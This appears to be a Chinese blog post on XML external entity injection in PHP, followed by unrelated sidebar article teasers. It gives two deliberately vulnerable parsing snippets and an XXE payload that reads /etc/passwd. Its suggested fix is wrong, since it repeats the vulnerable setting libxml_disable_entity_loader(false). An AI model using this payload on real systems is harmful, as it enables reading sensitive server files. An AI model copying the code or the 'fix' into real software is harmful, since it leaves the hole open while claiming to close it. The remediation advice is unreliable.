XML实体注入漏洞

xiaohai 2021-05-15 21:22:12 2157人围观 标签: php 
简介XML实体注入漏洞

参考链接

<?php
libxml_disable_entity_loader(false);
//第一种
$data = isset($_POST['data'])?trim($_POST['data']):'';
$resp = '';
if($data != false){
    $xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOENT); //必须要有这个SimpleXMLElement
    var_dump($xml); 
}

//第二种
$data = isset($_POST['data'])?trim($_POST['data']):'';
$resp = '';
if($data != false){
    $xml = new SimpleXMLElement($data, LIBXML_NOENT);
    var_dump($xml);
}
?>

那么POST的data数据为:

<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
    <name>&content;</name>
</note>

如果需要修复,只需要在前面加上:

libxml_disable_entity_loader(false);

相同类型文章

热门标签

每日一句

    任何倏忽的灵感事实上不能代替长期的功夫。

    ——罗丹

今日排行

  • partprobe:更新内核的磁盘分区表信息

    partprobe命令用于在硬盘分区发生变化是,更新Linux内核中的硬盘分区表数据。有时在使fdisk、part命令对硬盘进行分区后,会发现找不到新分区,此时需要重启系统才能使修改生效,但是partprobe可以不重启系统就让修改的分区表生效。

  • ping:测试主机之间网络的连通性

    ping命令用于测试主机之间的网络连通性。执行ping命令会使用ICMP传输协议,发送要求回应的信息,若远程主机的网络功能没有问题,就会回应信息,因而可得知该主机运行正常。

  • OpenCV-Python创建和显示窗口

    OpenCV-Python创建和显示窗口功能,主要介绍与窗口相关的函数,如:namedWindow、resizeWindow、imshow、waitKey。使用opencv创建窗口,需要用到namedWindow函数,上面的函数第一个参数为窗口名称,第二个为窗口的属性。创建窗口后设置窗口大小,设置窗口大小要使用resizeWindow,如果namedWindow函数第二个参数使用了WINDOW_AUTOSIZE,那么窗口不能进行修改大小了.

  • Go-Micro rpc调用注册的服务

    Go-Micro rpc调用注册的服务

  • 日常电脑小工具推荐

    在使用电脑的过程中,我们经常需要一些工具来帮助我们提高工作效率,本文主要记录生活中日常能提高工作效率的小工具和简要的使用说明,以便后期使用需要。

点击排行

友情链接